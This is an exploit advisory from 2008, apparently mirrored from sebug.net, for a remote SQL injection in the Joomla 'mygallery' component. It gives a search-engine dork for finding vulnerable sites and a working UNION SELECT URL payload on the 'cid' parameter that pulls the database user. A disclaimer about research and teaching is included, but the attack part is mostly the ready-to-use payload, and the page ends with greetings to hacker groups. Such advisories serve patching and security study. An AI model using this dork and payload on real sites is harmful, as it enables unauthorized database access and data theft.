Joomla Component mygallery (cid) Remote SQL Injection Vulnerability
Published:2008-07-01
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
H-T Team { HouSSamix & ToXiC350 }
=====================================================================
Joomla Component mygallery Remote SQL Injection Exploit
=====================================================================
## AUTHOR : HouSSamix From H-T TeaM
## Script : mygallery Joomla Component ( version unknown )
## DorKs : inurl:index.php?option=com_mygallery "cid"
## EXPLOIT :
index.php?option=com_mygallery&func=viewcategory&cid=-1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12--
## Note : the number of columns can be diffrent .
## GREETZ : CoNaN & Islam security Team & Mr l3frite & Mounita20 and all musulmans hackers// Sebug.net [ 2008-07-02 ]